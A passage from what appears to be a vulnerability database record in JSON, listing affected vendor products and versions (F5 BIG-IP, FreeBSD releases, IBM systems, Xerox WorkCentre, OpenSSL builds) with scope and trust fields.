"vendor": "f5", "version": "11.0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7530061.121.225.06100" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "7.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.4-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6.2" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "7.1-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "project openssl 0.9.8w", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.1.0" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2407863" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "idatplex dx360 m4 water cooled type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79180" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35007383" }, { "model": "project openssl 1.0.0m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.1.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78450" }, { "model": "release-p4", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "project openssl 1.0.1g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "project openssl 0.9.8m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72250" }, { "model": "10.0-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "9.1-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl j", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "clustered data ontap antivirus connector", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2207906" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "megaraid storage manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.03.01.00" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.9" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "hp-ux b.11.23 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v2)" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip webaccelerator hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "-release/alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "8.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.1" }, { "model": "9.2-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5" }, { "model": "2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78350" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "9.1--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "proventia network security controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "idatplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79130" }, { "model": "6.3-release-p10", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "9.3-beta3-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "72200" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57350" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7556061.121.225.06100" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "-release-p8", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "9.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "-release-p14", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.40" }, { "model": "-stablepre2001-07-20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "project openssl 0.9.8r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5855072.060.134.32804" }, { "model": "8.3-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "6.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "9.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.0" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x33007382" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "7.2-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "virtual connect 8gb 24-port fc module", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0" }, { "model": "project openssl 0.9.8y", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "7.0-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.0-rc3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "78300" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x638370" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "big-ip ltm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl 1.0.0l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "oncommand unified manager core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "upward integration modules integrated installer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "9.1-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "7.1-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "31005.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "7.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75300" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rc2", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "9.0-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7955" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "nextscale nx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "54550" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.2-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-stablepre122300", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.2x" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "7.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.0-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "8.4-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408738" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5875072.060.134.32804" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.2" }, { "model": "8.1-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75450" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0.x" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.3-rc", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "9.3-beta1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8za", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "8.4-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.1-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "snapdrive for windows", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "project openssl 0.9.8m beta1", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9301072.180.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.7" }, { "model": "big-ip edge gateway hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "-pre-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365079150" }, { "model": "rational application developer for websphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "8.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "enterprise linux load balancer eus 6.5.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "9.2-rc2-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58750" }, { "model": "security network intrusion prevention system gv200", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "9.2-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x35507914" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.1" }, { "model": "8.3-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "9.1-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "9.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.3" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.5" }, { "model": "7.3-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "7.2-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3x" }, { "model": "9.3-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "8.3-release-p8", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "-stablepre2002-03-07", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8v" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl 1.0.1f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "oncommand workflow automation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "gpfs for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.0.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x357087330" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.2" }, { "model": "8.3-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.1.6.1" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "upward integration modules scvmm add-in", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "7.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "8.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 0.9.8g", 